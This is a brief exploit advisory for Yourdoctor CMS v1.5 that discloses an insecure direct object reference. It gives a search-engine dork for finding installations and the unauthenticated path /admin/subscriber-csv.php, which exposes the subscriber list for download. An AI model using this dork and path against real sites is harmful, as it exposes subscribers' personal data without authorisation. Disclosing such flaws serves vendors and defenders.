====================================================================================================================================
| # Title     : Yourdoctor CMS v1.5 Insecure Direct Object Reference Vulnerability                                                 |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             |
| # Vendor    : https://codecanyon.net/item/yourdoctor-medical-and-doctor-website-cms/20811493                                     |  
| # Dork      : "Lorem ipsum dolor sit amet, omnis signiferumque in mei, mei ex."                                                  |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Unauthorized administrator access. Allows any visitor to Download subscriber list.

[+] use payload : /admin/subscriber-csv.php

[+] http://127.0.0.1/admin/subscriber-csv.php

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================